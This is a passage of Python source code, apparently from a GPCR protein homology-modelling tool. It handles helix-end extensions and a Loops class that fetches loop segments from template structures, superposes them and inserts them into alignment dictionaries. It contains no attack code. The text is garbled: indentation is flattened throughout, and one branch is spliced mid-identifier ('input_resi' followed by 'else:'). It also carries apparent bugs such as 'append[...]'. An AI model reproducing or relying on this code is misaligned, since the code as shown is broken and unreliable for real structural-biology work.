len(modifications['added'][ref_seg][0])>0: found_alt_start = False for struct in self.similarity_table: if struct!=main_structure: try: if skip_template and struct.pdb_code.index in self.templates_to_skip[ref_seg][0]: continue alt_helix_ends = self.fetch_struct_helix_ends_from_db(struct) protein_conf = ProteinConformation.objects.get(protein=struct.protein_conformation.protein.parent) if parser.gn_comparer(alt_helix_ends[ref_seg][0],self.helix_ends[ref_seg][0], protein_conf)<=0: all_keys = list(a.reference_dict[ref_seg].keys())[:len(modifications['added'][ref_seg][0])+4] ref_keys = [i for i in all_keys if i not in modifications['added'][ref_seg][0]] reference = parser.fetch_residues_from_array(main_pdb_array[ref_seg],ref_keys) template = parser.fetch_residues_from_pdb(struct,all_keys) superpose = sp.OneSidedSuperpose(reference,template,4,0) sup_residues = superpose.run() new_residues = OrderedDict() for gn, atoms in sup_residues.items(): gn_ = gn.replace('.','x') if gn_ not in ref_keys: new_residues[gn] = atoms a.template_dict[temp_seg][gn_] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn_]==a.reference_dict[ref_seg][gn_]: 
a.alignment_dict[ref_seg][gn_] = a.reference_dict[ref_seg][gn_] else: a.alignment_dict[ref_seg][gn_] = '.' for gn, atoms in main_pdb_array[ref_seg].items(): if gn not in new_residues: new_residues[gn] = atoms main_pdb_array[ref_seg] = new_residues self.update_template_source(modifications['added'][ref_seg][0],struct,ref_seg) found_alt_start = True break except: pass if found_alt_start==False: new_residues = OrderedDict() for i in modifications['added'][ref_seg][0]: new_residues[i.replace('x','.')] = 'x' a.template_dict[ref_seg][i] = 'x' a.alignment_dict[ref_seg][i] = 'x' for i,j in main_pdb_array[ref_seg].items(): new_residues[i] = j main_pdb_array[ref_seg] = new_residues if len(modifications['added'][ref_seg][1])>0: found_alt_end = False for struct in self.similarity_table: if struct!=main_structure: try: if skip_template and struct.pdb_code.index in self.templates_to_skip[ref_seg][1]: continue protein_conf = ProteinConformation.objects.get(protein=struct.protein_conformation.protein.parent) alt_helix_ends = self.fetch_struct_helix_ends_from_db(struct) if parser.gn_comparer(alt_helix_ends[ref_seg][1],self.helix_ends[ref_seg][1], protein_conf)>=0: all_keys = list(a.reference_dict[ref_seg].keys())[-1*(len(modifications['added'][ref_seg][1])+4):] ref_keys = [i for i in all_keys if i not in modifications['added'][ref_seg][1]] reference = parser.fetch_residues_from_array(main_pdb_array[ref_seg],ref_keys) template = parser.fetch_residues_from_pdb(struct,all_keys) superpose = sp.OneSidedSuperpose(reference,template,4,1) sup_residues = superpose.run() new_residues = OrderedDict() for gn, atoms in sup_residues.items(): if gn.replace('.','x') not in ref_keys: new_residues[gn]=atoms for gn, atoms in new_residues.items(): gn_ = gn.replace('.','x') if gn_ in modifications['added'][ref_seg][1]: main_pdb_array[ref_seg][gn] = atoms a.template_dict[ref_seg][gn_] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[ref_seg][gn_]==a.reference_dict[ref_seg][gn_]: a.alignment_dict[ref_seg][gn_] = a.reference_dict[ref_seg][gn_] else: a.alignment_dict[ref_seg][gn_] = '.' self.update_template_source(modifications['added'][ref_seg][1], struct,segment=ref_seg) found_alt_end = True break except: pass if found_alt_end==False: for i in modifications['added'][ref_seg][1]: main_pdb_array[ref_seg][i.replace('x','.')] = 'x' a.template_dict[ref_seg][i] = 'x' a.alignment_dict[ref_seg][i] = 'x' self.helix_end_mods = modifications self.main_pdb_array = main_pdb_array self.alignment = a return main_pdb_array, a class Loops(object): ''' Class to handle loops in GPCR structures. 
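    A minimal construction sketch (arguments mirror __init__; the values
    are illustrative):

        loop = Loops(reference_protein, 'ECL2', loop_template_structures,
                     main_structure, helix_end_mods, segment_order,
                     revise_xtal=False)
        loop_template = loop.fetch_loop_residues(main_pdb_array)

    ECL2 is handled as three sub-segments (ECL2_1, ECL2_mid covering the
    conserved 45x50-45x52 stretch, and ECL2_2), each of which may be taken
    from a different template structure.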
''' def __init__(self, reference_protein, loop_label, loop_template_structures, main_structure, helix_end_mods, segment_order, revise_xtal): self.segment_order = segment_order if revise_xtal==True: ref_prot = reference_protein.parent else: ref_prot = reference_protein self.reference_protein = ref_prot self.prot_conf = ProteinConformation.objects.get(protein=ref_prot) self.loop_label = loop_label self.loop_template_structures = loop_template_structures self.main_structure = main_structure self.helix_end_mods = helix_end_mods self.loop_output_structure = None self.new_label = None self.aligned = False self.model_loop = False self.partialECL2_1 = False self.partialECL2_2 = False self.excluded_loops = {'ICL1':[],'ECL1':[],'ICL2':[],'ECL2':[],'ECL2_1':[],'ECL2_mid':[],'ECL2_2':[],'ICL3':['3VW7'],'ECL3':['4DJH']} self.evade_chain_break = False def fetch_loop_residues(self, main_pdb_array, superpose_modded_loop=False): ''' Fetch list of Atom objects of the loop when there is an available template. Returns an OrderedDict(). ''' if (self.loop_label=='ECL2' and (self.loop_template_structures==None or 'ECL2_mid' in self.loop_template_structures and self.loop_template_structures['ECL2_mid']==None)): return None if self.loop_template_structures!=None: ref_loop = list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=self.loop_label)) parse = GPCRDBParsingPDB() seg_list = self.segment_order prev_seg = seg_list[seg_list.index(self.loop_label)-1] next_seg = seg_list[seg_list.index(self.loop_label)+1] if prev_seg=='C-term': orig_before_gns = [] else: orig_before_gns = [i.replace('.','x') for i in list(main_pdb_array[prev_seg].keys())[-4:]] orig_after_gns = [j.replace('.','x') for j in list(main_pdb_array[next_seg].keys())[:4]] if len(orig_before_gns)==0: last_before_gn = None else: last_before_gn = orig_before_gns[-1] first_after_gn = orig_after_gns[0] if self.loop_label=='ECL2': try: ref_res = Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug='ECL2') r_first = list(ref_res)[0].sequence_number r_last = list(ref_res)[-1].sequence_number r_x50 = ref_res.get(display_generic_number__label='45.50x50').sequence_number except: pass output = OrderedDict() if (self.loop_label=='ECL2' and 'ECL2_1' not in self.loop_template_structures) or self.loop_label!='ECL2' or superpose_modded_loop==True: for template in self.loop_template_structures: if self.loop_label=='ICL2' and template!='aligned' and template.pdb_code.index=='2RH1' and self.reference_protein.entry_name=='adrb2_human': continue output = OrderedDict() try: if (template==self.main_structure or template=='aligned') and superpose_modded_loop==False and template.pdb_code.index not in self.excluded_loops[self.loop_label]: if self.helix_end_mods!=None and (len(self.helix_end_mods['removed'][prev_seg][1])==0 and len(self.helix_end_mods['removed'][next_seg][0])==0 and len(self.helix_end_mods['added'][prev_seg][1])==0 and len(self.helix_end_mods['added'][next_seg][0])==0): if template=='aligned': self.aligned = True else: self.aligned = False try: l_res = self.compare_parent_loop_to_child(self.loop_label,template) if l_res==False: raise Exception() loop_res = [r.sequence_number for r in l_res[1]] at_least_one_gn = False x50_present, x50_temp_present = False, False for i in ref_loop: try: g = ggn(i.display_generic_number.label) at_least_one_gn = True if 'x50' in g: x50_present = True break except: pass for j in l_res[1]: try: g2 = ggn(j.display_generic_number.label) if 'x50' in g2: 
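                                        # flag templates whose loop also anchors the conserved x50
                                        # position; templates lacking it are skipped below when the
                                        # reference loop has one and alternatives exist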
x50_temp_present = True except: pass if self.loop_template_structures[template]!=0: if x50_present==False and len(ref_loop)!=len(loop_res): continue elif x50_present==True and x50_temp_present==False and len(self.loop_template_structures)>1: continue partial = False else: partial = True if len(self.helix_end_mods['added'][prev_seg][1])!=0 or len(self.helix_end_mods['added'][next_seg][0])!=0: continue if at_least_one_gn==True: inter_array = parse.fetch_residues_from_pdb(self.main_structure,loop_res) else: inter_array = parse.fetch_residues_from_pdb(self.main_structure,loop_res, just_nums=True) self.loop_output_structure = self.main_structure if partial==False: for id_, atoms in inter_array.items(): output[str(id_)] = atoms else: p_c = ProteinConformation.objects.get(protein=self.main_structure.protein_conformation.protein.parent) p_loop_res = Residue.objects.filter(protein_conformation=p_c, protein_segment__slug=self.loop_label) for num in p_loop_res: try: output[str(num.sequence_number)] = inter_array[str(num.sequence_number)] except: output[str(num.sequence_number)] = '-' return output except: self.aligned = False continue else: # print('Warning: need to superpose aligned {}'.format(self.loop_label)) return self.fetch_loop_residues(main_pdb_array,superpose_modded_loop=True) else: if template.pdb_code.index in self.excluded_loops[self.loop_label]: continue if self.loop_label=='ICL4' and len(list(Residue.objects.filter(protein_conformation=self.prot_conf,protein_segment__slug='ICL4')))<3: raise Exception() if template=='aligned' or template==self.main_structure: template = self.main_structure self.aligned = True if superpose_modded_loop==True: self.model_loop = True alt_last_before_gn = last_before_gn b_num_found = False break_count = 0 while b_num_found==False and break_count<30: try: b_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(alt_last_before_gn, template.protein_conformation)).sequence_number b_num_found = True except: alt_last_before_gn = parse.gn_indecer(alt_last_before_gn,'x',-1) break_count+=1 alt_first_after_gn = first_after_gn a_num_found = False break_count = 0 while a_num_found==False and break_count<30: try: a_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(alt_first_after_gn, template.protein_conformation)).sequence_number a_num_found = True except: alt_first_after_gn = parse.gn_indecer(alt_first_after_gn,'x',1) break_count+=1 else: b_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(last_before_gn, template.protein_conformation)).sequence_number a_num = Residue.objects.get(protein_conformation=template.protein_conformation, display_generic_number__label=dgn(first_after_gn, template.protein_conformation)).sequence_number before4 = Residue.objects.filter(protein_conformation=template.protein_conformation, sequence_number__in=[b_num,b_num-1,b_num-2,b_num-3]) after4 = Residue.objects.filter(protein_conformation=template.protein_conformation, sequence_number__in=[a_num,a_num+1,a_num+2,a_num+3]) x50_present = False for i in ref_loop: try: if 'x50' in i.display_generic_number.label: x50_present = True except: pass if superpose_modded_loop==True and self.aligned==True: loop_residues = Residue.objects.filter(protein_conformation=template.protein_conformation, protein_segment__slug=self.loop_label) p_c_check = self.compare_parent_loop_to_child(self.loop_label,template) if p_c_check==False: 
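                                # construct and parent wild-type sequences disagree over this
                                # loop, so reject the template (the raise is caught by the
                                # enclosing except, which moves on to the next candidate)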
raise Exception() else: del_from_loop = [] for i in loop_residues: if i not in p_c_check[1]: del_from_loop.append(i) loop_residues = [i for i in loop_residues if i not in del_from_loop] if (self.loop_label in ['ICL1','ECL1','ICL2'] and not x50_present and len(loop_residues)!=len(ref_loop)): raise Exception() else: loop_residues = Residue.objects.filter(protein_conformation=template.protein_conformation, protein_segment__slug=self.loop_label) loop_residues_test = Residue.objects.filter(protein_conformation=template.protein_conformation, protein_segment__slug=self.loop_label) p_c = ProteinConformation.objects.get(protein=template.protein_conformation.protein.parent) loop_residues_test_parent = Residue.objects.filter(protein_conformation=p_c, protein_segment__slug=self.loop_label) gn_nums_loop = [i for i in loop_residues if i.generic_number!=None and i.protein_segment.slug[0] not in ['T','H']] if self.loop_label in ['ICL1','ECL1','ICL2'] and x50_present==True: if len(gn_nums_loop)==0 or len(gn_nums_loop)<len([i for i in ref_loop if i.generic_number!=None and i.protein_segment.slug[0] not in ['T','H']]): continue else: loop_residues = loop_residues_test if len(loop_residues_test)!=len(loop_residues_test_parent): continue before_gns = [x.sequence_number for x in before4] mid_nums = [x.sequence_number for x in loop_residues] after_gns = [x.sequence_number for x in after4] alt_residues = parse.fetch_residues_from_pdb(template, before_gns+mid_nums+after_gns) orig_residues1 = parse.fetch_residues_from_array(main_pdb_array[prev_seg],orig_before_gns) orig_residues2 = parse.fetch_residues_from_array(main_pdb_array[next_seg],orig_after_gns) orig_residues = parse.add_two_ordereddict(orig_residues1,orig_residues2) superpose = sp.LoopSuperpose(orig_residues, alt_residues) new_residues = superpose.run() key_list = list(new_residues.keys())[4:-4] for key in key_list: output[key] = new_residues[key] self.loop_output_structure = template return output except: self.aligned = False continue else: output,ECL2_1,ECL2_mid,ECL2_2 = OrderedDict(),OrderedDict(),OrderedDict(),OrderedDict() no_first_temp, no_second_temp = True,True main_temp_seq = Residue.objects.filter(protein_conformation=self.main_structure.protein_conformation, protein_segment__slug=self.loop_label) cp = self.compare_parent_loop_to_child(self.loop_label, self.main_structure) try: if cp[0]==True: main_temp_seq = cp[1] except: pass for mid_template in self.loop_template_structures['ECL2_mid']: ref_ECL2_res = Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='ECL2') ref_ECL2_45x50 = ref_ECL2_res.get(display_generic_number__label='45.50x50') ref_ECL2_2_res = [i for i in ref_ECL2_res if i.sequence_number>ref_ECL2_45x50.sequence_number+2] if type(main_temp_seq)==type([]): temp_ECL2_45x50 = [i for i in main_temp_seq if i.display_generic_number!=None and i.display_generic_number.label=='45.50x50'][0] else: temp_ECL2_45x50 = main_temp_seq.get(display_generic_number__label='45.50x50') temp_ECL2_2_res = [i for i in main_temp_seq if i.sequence_number>temp_ECL2_45x50.sequence_number+2] if len(temp_ECL2_2_res)>len(ref_ECL2_2_res) and len(ref_ECL2_2_res)<2: self.evade_chain_break = True if mid_template==self.main_structure: ECL2_mid = parse.fetch_residues_from_pdb(self.main_structure,['45x50','45x51','45x52']) try: x50 = [i.sequence_number for i in main_temp_seq if i.display_generic_number!=None and i.display_generic_number.label=='45.50x50'][0] except: x50 = 
main_temp_seq.get(display_generic_number__label='45.50x50').sequence_number break else: try: ECL2_mid = parse.fetch_residues_from_pdb(mid_template,[last_before_gn,first_after_gn,'3x25', '45x50','45x51','45x52']) ref_ECL2_mid1 = parse.fetch_residues_from_array(main_pdb_array['TM4'],[last_before_gn]) ref_ECL2_mid2 = parse.fetch_residues_from_array(main_pdb_array['TM5'],[first_after_gn]) ref_ECL2_mid3 = parse.fetch_residues_from_array(main_pdb_array['TM3'],['3x25']) ref_ECL2_mid = parse.add_two_ordereddict(parse.add_two_ordereddict(ref_ECL2_mid1, ref_ECL2_mid2), ref_ECL2_mid3) superpose = sp.ECL2MidSuperpose(ref_ECL2_mid,ECL2_mid) new_mid_residues = superpose.run() ECL2_mid = OrderedDict() for i,j in new_mid_residues.items(): if i in ['45.50','45.51','45.52']: ECL2_mid[i] = j break except: continue o1 = parse.fetch_residues_from_array(main_pdb_array[prev_seg],orig_before_gns) orig_residues1 = parse.add_two_ordereddict(o1,ECL2_mid) if self.loop_template_structures['ECL2_1']==None: no_first_temp=True else: for first_temp in self.loop_template_structures['ECL2_1']: if first_temp.pdb_code.index in self.excluded_loops['ECL2_1']: continue if first_temp==self.main_structure: try: ECL2_1 = parse.fetch_residues_from_pdb(self.main_structure, list(range(list(main_temp_seq)[0].sequence_number,x50))) no_first_temp=False break except: try: partial_seq1 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, sequence_number__in=list(range(list(main_temp_seq)[0].sequence_number,x50))) partial_seq1_nums = [i.sequence_number for i in partial_seq1] ECL2_1 = parse.fetch_residues_from_pdb(first_temp, partial_seq1_nums) no_first_temp=False self.partialECL2_1 = True break except: continue else: try: b_num = Residue.objects.get(protein_conformation=first_temp.protein_conformation, display_generic_number__label=dgn(last_before_gn, first_temp.protein_conformation)).sequence_number before4 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, sequence_number__in=[b_num,b_num-1,b_num-2,b_num-3]) alt_mid1 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, protein_segment__slug=self.loop_label, display_generic_number__label__in=['45.50x50','45.51x51','45.52x52']) alt1_x50 = alt_mid1.get(display_generic_number__label='45.50x50').sequence_number loop_res1 = Residue.objects.filter(protein_conformation=first_temp.protein_conformation, sequence_number__in=list(range(b_num+1, alt1_x50))).filter(protein_segment__slug=self.loop_label) before_gns = [x.sequence_number for x in before4] mid_gns1 = [x.sequence_number for x in loop_res1] alt_residues1 = parse.fetch_residues_from_pdb(first_temp,before_gns+mid_gns1+['45x50','45x51','45x52']) superpose = sp.LoopSuperpose(orig_residues1,alt_residues1,ECL2=True,part=1) new_residues = superpose.run() key_list = list(new_residues.keys())[4:-3] for key in key_list: ECL2_1["1_"+key] = new_residues[key] no_first_temp=False break except: no_first_temp=True if no_first_temp==True: for i in range(1,r_x50-r_first+1): ECL2_1['1_'+str(i)]='x' first_temp=None o2 = parse.fetch_residues_from_array(main_pdb_array[next_seg],orig_after_gns) orig_residues2 = parse.add_two_ordereddict(ECL2_mid,o2) if self.loop_template_structures['ECL2_2']==None: no_second_temp=True else: for second_temp in self.loop_template_structures['ECL2_2']: if second_temp.pdb_code.index in self.excluded_loops['ECL2_2']: continue if second_temp==self.main_structure: try: ECL2_2 = 
parse.fetch_residues_from_pdb(self.main_structure,list(range(x50+3,list(main_temp_seq)[-1].sequence_number+1))) no_second_temp=False break except: try: partial_seq2 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, sequence_number__in=list(range(x50+3,list(main_temp_seq)[-1].sequence_number+1))) partial_seq2_nums = [i.sequence_number for i in partial_seq2] ECL2_2 = parse.fetch_residues_from_pdb(second_temp, partial_seq2_nums) no_second_temp=False self.partialECL2_2 = True break except: continue else: try: a_num = Residue.objects.get(protein_conformation=second_temp.protein_conformation, display_generic_number__label=dgn(first_after_gn, second_temp.protein_conformation)).sequence_number after4 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, sequence_number__in=[a_num,a_num+1,a_num+2,a_num+3]) alt_mid2 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, protein_segment__slug=self.loop_label, display_generic_number__label__in=['45.50x50','45.51x51','45.52x52']) alt2_x50 = alt_mid2.get(display_generic_number__label='45.50x50').sequence_number loop_res2 = Residue.objects.filter(protein_conformation=second_temp.protein_conformation, sequence_number__in=list(range(alt2_x50+3, a_num))).filter(protein_segment__slug=self.loop_label) mid_gns2 = [x.sequence_number for x in loop_res2] after_gns = [x.sequence_number for x in after4] alt_residues2 = parse.fetch_residues_from_pdb(second_temp,['45x50','45x51','45x52']+mid_gns2+after_gns) superpose = sp.LoopSuperpose(orig_residues2,alt_residues2,ECL2=True,part=2) new_residues = superpose.run() key_list = list(new_residues.keys())[3:-4] for key in key_list: ECL2_2["2_"+key] = new_residues[key] no_second_temp=False break except: no_second_temp=True if no_second_temp==True: for j in range(1,r_last-r_x50-1): ECL2_2['2_'+str(j)]='x' second_temp=None output['ECL2_1'] = ECL2_1 output['ECL2_mid'] = ECL2_mid output['ECL2_2'] = ECL2_2 self.loop_output_structure = [first_temp,mid_template,second_temp] return output if len(output.keys())==0: return None else: return None def insert_loop_to_arrays(self, loop_output_structure, main_pdb_array, loop_template, reference_dict, template_dict, alignment_dict): ''' Updates the homology model with loop segments. Inserts previously fetched lists of loop Atom objects to the proper arrays, dictionaries. @param loop_output_structure: Structure object of loop template. @param main_pdb_array: nested OrderedDict(), output of GPCRDBParsingPDB().pdb_array_creator(). @param loop_template: OrderedDict() of loop template with lists of Atom objects as values. @param reference_dict: reference dictionary of AlignedReferenceTemplate. @param template_dict: template dictionary of AlignedReferenceTemplate. @param alignment_dict: alignment dictionary of AlignedReferenceTemplate. 
''' shorter_ref, shorter_temp = False, False try: for r,t in zip(reference_dict[self.loop_label],template_dict[self.loop_label]): if reference_dict[self.loop_label][r] in ['-','x']: shorter_ref = True self.model_loop = True elif template_dict[self.loop_label][t] in ['-','x']: shorter_temp = True self.model_loop = True except: pass if loop_template!=None and loop_output_structure!=self.main_structure: loop_keys = list(loop_template.keys())[1:-1] continuous_loop = False self.main_pdb_array = self.discont_loop_insert_to_pdb(main_pdb_array, loop_template, loop_output_structure, temp_dict=template_dict) elif loop_template!=None and loop_output_structure==self.main_structure or self.aligned==True and (shorter_ref==True or shorter_temp==True): loop_keys = list(loop_template.keys()) continuous_loop = True temporary_dict = OrderedDict() # correct for partial loops try: query_temp_dict = template_dict[self.loop_label] except: query_temp_dict = OrderedDict() parent_loop = Residue.objects.filter(protein_conformation__protein=loop_output_structure.protein_conformation.protein.parent, protein_segment__slug=self.loop_label) for i in parent_loop: query_temp_dict[str(i.sequence_number)] = '-' try: if len(loop_keys)<len(query_temp_dict): counter=0 for i in query_temp_dict: if i.replace('x','.') in loop_keys: temporary_dict[i.replace('x','.')] = loop_template[i.replace('x','.')] else: temporary_dict['gap{}'.format(str(counter))] = '-' counter+=1 loop_template = temporary_dict except: pass self.main_pdb_array = self.cont_loop_insert_to_pdb(main_pdb_array, template_dict, loop_template) else: self.main_pdb_array = main_pdb_array if loop_template!=None: temp_ref_dict, temp_temp_dict, temp_aligned_dict = OrderedDict(),OrderedDict(),OrderedDict() if continuous_loop==True: if shorter_ref==True and shorter_temp==False: ref_residues = list(reference_dict[self.loop_label].values()) elif shorter_ref==True and shorter_temp==True: ref_residues = list(reference_dict[self.loop_label].values()) elif shorter_ref==False and shorter_temp==True: ref_residues = list(reference_dict[self.loop_label].values()) else: ref_residues = [x.amino_acid for x in Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=self.loop_label)] else: try: ref_residues = list(reference_dict[self.loop_label].values()) except: ref_residues = list(Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug=self.loop_label)) for ref_seg, temp_seg, aligned_seg in zip(reference_dict, template_dict, alignment_dict): if ref_seg[0]=='T' and self.segment_order.index(self.loop_label)-self.segment_order.index(ref_seg[:4])==1: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] input_residues = list(loop_template.keys()) ref_loop_seg, temp_loop_seg, aligned_loop_seg = OrderedDict(),OrderedDict(),OrderedDict() if continuous_loop==True: l_res=0 for r_res, r_id in zip(ref_residues, input_residues): l_res+=1 try: loop_gn = ggn(Residue.objects.get(protein_conformation=self.main_structure.protein_conformation, display_generic_number__label=dgn(r_id.replace('.','x'), self.main_structure.protein_conformation)).display_generic_number.label) except: try: Residue.objects.get(protein_conformation=self.main_structure.protein_conformation, sequence_number=r_id) loop_gn = self.loop_label+'|'+str(l_res) except: loop_gn = self.loop_label+'?'+str(l_res) ref_loop_seg[loop_gn] = r_res try: 
temp_loop_seg[loop_gn] = PDB.Polypeptide.three_to_one(loop_template[r_id][0].get_parent().get_resname()) except: temp_loop_seg[loop_gn] = '-' if ref_loop_seg[loop_gn]==temp_loop_seg[loop_gn]: aligned_loop_seg[loop_gn] = ref_loop_seg[loop_gn] elif ref_loop_seg[loop_gn]=='-' or temp_loop_seg[loop_gn]=='-': aligned_loop_seg[loop_gn] = '-' else: aligned_loop_seg[loop_gn] = '.' self.new_label = self.loop_label+'_cont' temp_ref_dict[self.loop_label+'_cont'] = ref_loop_seg temp_temp_dict[self.loop_label+'_cont'] = temp_loop_seg temp_aligned_dict[self.loop_label+'_cont'] = aligned_loop_seg else: missing_indeces = [] try: if len(list(template_dict[self.loop_label].keys()))<len(input_residues): for i in input_residues: try: template_dict[self.loop_label][i.replace('.','x')] except: missing_indeces.append([i,input_residues.index(i)]) temp_ref_residues = [] for i in range(len(ref_residues)): for j in missing_indeces: if i==j[1]: temp_ref_residues.append(j[0]) temp_ref_residues.append(ref_residues[i]) ref_residues = temp_ref_residues if len(list(template_dict[self.loop_label].keys()))<len(input_residues): for j in missing_indeces: if j[1]>=len(ref_residues): ref_residues.append[j[0]] elif len(list(template_dict[self.loop_label].keys()))>len(input_residues): for i in list(template_dict[self.loop_label].keys()): try: input_residues.index(i.replace('x','.')) except: missing_indeces.append([i,list(template_dict[self.loop_label].keys()).index(i)]) temp_input_residues = [] if self.loop_label in ['ICL1', 'ECL1', 'ICL2']: for i in range(0,len(list(template_dict[self.loop_label].keys()))): gap_inserted = False for j in missing_indeces: if i==j[1]: temp_input_residues.append(j[0]) gap_inserted = True break if gap_inserted==False: temp_input_residues.append(list(template_dict[self.loop_label])[i].replace('x','.')) input_residues = temp_input_residues if len(list(template_dict[self.loop_label].keys()))>len(input_residues): for j in missing_indeces: if j[1]>=len(input_residues): input_resi else: for i in range(len(input_residues)): for j in missing_indeces: if i==j[1]: temp_input_residues.append(j[0]) temp_input_residues.append(input_residues[i]) input_residues = temp_input_residues if len(list(template_dict[self.loop_label].keys()))>len(input_residues): for j in missing_indeces: if j[1]>=len(input_residues): input_residues.append(j[0]) except: pass loop_ends = [] start_found, end_found = False, False for i in range(len(ref_residues)): if ref_residues[i]!='x' and start_found==False: loop_ends.append(i) start_found = True if ref_residues[(i+1)*-1]!='x' and end_found==False: loop_ends.append((i+1)*-1) end_found = True if start_found and end_found: break l_res=0 temp_pdb_dict = OrderedDict() for r_res, r_id in zip(ref_residues, input_residues): if l_res==loop_ends[0] or len(ref_residues)+loop_ends[1]==l_res: try: ref_loop_seg[self.loop_label+'?'+str(l_res+1)] = ref_residues[l_res].amino_acid except: ref_loop_seg[self.loop_label+'?'+str(l_res+1)] = ref_residues[l_res] temp_loop_seg[self.loop_label+'?'+str(l_res+1)] = 'x' aligned_loop_seg[self.loop_label+'?'+str(l_res+1)] = 'x' temp_pdb_dict[self.loop_label+'?'+str(l_res+1)] = 'x' l_res+=1 continue l_res+=1 try: try: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, display_generic_number__label=dgn(r_id.replace('.','x'), loop_output_structure.protein_conformation)).display_generic_number.label) ggn(Residue.objects.get(protein_conformation=self.prot_conf, display_generic_number__label=dgn(loop_gn, 
self.prot_conf)).display_generic_number.label) except: loop_gn = ggn(Residue.objects.get(protein_conformation=loop_output_structure.protein_conformation, sequence_number=r_id).display_generic_number.label) if len(loop_gn.split('x')[0])==1: raise Exception() except: try: if template_dict[self.loop_label][r_id.replace('.','x')] in ['x','-'] or r_res=='x': loop_gn = self.loop_label+'?'+str(l_res) else: raise Exception() except: loop_gn = self.loop_label+'|'+str(l_res) try: ref_loop_seg[loop_gn] = r_res.amino_acid except: ref_loop_seg[loop_gn] = r_res try: temp_loop_seg[loop_gn] = PDB.Polypeptide.three_to_one(loop_template[r_id][0].get_parent().get_resname()) except: temp_loop_seg[loop_gn] = '-' if ref_loop_seg[loop_gn]==temp_loop_seg[loop_gn]: aligned_loop_seg[loop_gn] = ref_loop_seg[loop_gn] else: aligned_loop_seg[loop_gn] = '.' try: temp_pdb_dict[loop_gn.replace('x','.')] = loop_template[r_id] except: temp_pdb_dict[loop_gn.replace('x','.')] = '-' self.new_label = self.loop_label+'_dis' temp_ref_dict[self.new_label] = ref_loop_seg temp_temp_dict[self.new_label] = temp_loop_seg temp_aligned_dict[self.new_label] = aligned_loop_seg self.main_pdb_array[self.new_label] = temp_pdb_dict else: temp_ref_dict[ref_seg] = reference_dict[ref_seg] temp_temp_dict[temp_seg] = template_dict[temp_seg] temp_aligned_dict[aligned_seg] = alignment_dict[aligned_seg] self.reference_dict = temp_ref_dict self.template_dict = temp_temp_dict self.alignment_dict = temp_aligned_dict try: del self.reference_dict[self.loop_label] del self.template_dict[self.loop_label] del self.alignment_dict[self.loop_label] except: pass else: self.reference_dict = reference_dict self.template_dict = template_dict self.alignment_dict = alignment_dict try: del self.reference_dict[self.loop_label] del self.template_dict[self.loop_label] del self.alignment_dict[self.loop_label] except: pass return self def insert_ECL2_to_arrays(self, loop_output_structure, main_pdb_array, loop_template, reference_dict, template_dict, alignment_dict, partialECL2_1=False, partialECL2_2=False): temp_array = OrderedDict() parent = ProteinConformation.objects.get(protein=loop_output_structure[1].protein_conformation.protein.parent) seq = list(Residue.objects.filter(protein_conformation=parent, protein_segment__slug='ECL2')) x50 = [i for i in seq if i.generic_number!=None and i.generic_number.label=='45x50'][0] x50_i = seq.index(x50) # first part if loop_output_structure[0]!=None: if loop_output_structure[0]==self.main_structure: temp_array = self.cont_loop_insert_to_pdb(main_pdb_array, template_dict, loop_template['ECL2_1'], ECL2='', x50_i=x50_i) else: ref_seq1 = list(Residue.objects.filter(protein_conformation__protein=self.reference_protein, protein_segment__slug='ECL2')) ref_x50 = [i for i in ref_seq1 if i.generic_number!=None and i.generic_number.label=='45x50'][0] ref_x50i = ref_seq1.index(ref_x50) if loop_output_structure[0]!=loop_output_structure[1]: parent = ProteinConformation.objects.get(protein=loop_output_structure[0].protein_conformation.protein.parent) seq = list(Residue.objects.filter(protein_conformation=parent, protein_segment__slug='ECL2')) t_dict1 = OrderedDict([('ECL2',OrderedDict())]) for i in seq[:ref_x50i]: # if i.sequence_number<x50.sequence_number: t_dict1['ECL2']['1_'+str(i.sequence_number)] = '-' temp_array = self.discont_loop_insert_to_pdb(main_pdb_array, loop_template['ECL2_1'], loop_output_structure, ECL2='', temp_dict=t_dict1) else: temp_array = self.gap_ECL2(main_pdb_array,loop_template['ECL2_1'],break_chain=True) # middle part for 
key, res in loop_template['ECL2_mid'].items(): temp_array['ECL2'][key] = res # second part l_res = len(temp_array['ECL2']) if loop_output_structure[2]!=None: if loop_output_structure[2]==self.main_structure: if partialECL2_2==True: for key in list(template_dict['ECL2'])[x50_i+3:]: l_res+=1 if key in loop_template['ECL2_2']: temp_array['ECL2'][self.loop_label+'|'+str(l_res)] = loop_template['ECL2_2'][key] else: temp_array['ECL2'][self.loop_label+'?'+str(l_res)] = '-' else: for key, res in loop_template['ECL2_2'].items(): l_res+=1 if '.' in key: temp_array['ECL2'][key] = res else: temp_array['ECL2'][self.loop_label+'|'+str(l_res)] = res else: loop_keys = list(loop_template['ECL2_2'].keys())[1:-1] temp_array['ECL2'][self.loop_label+'?'+str(l_res+1)] = 'x' l_res+=1 if len(list(loop_template['ECL2_2'].keys()))>1: for key in loop_keys: l_res+=1 temp_array['ECL2'][self.loop_label+'|'+str(l_res)] = loop_template['ECL2_2'][key] temp_array['ECL2'][self.loop_label+'?'+str(l_res+1)] = 'x' else: for key, res in loop_template['ECL2_2'].items(): l_res+=1 temp_array['ECL2'][self.loop_label+'?'+str(l_res)] = '-' self.main_pdb_array = temp_array temp_ref_dict, temp_temp_dict, temp_aligned_dict = OrderedDict(),OrderedDict(),OrderedDict() ref_residues = 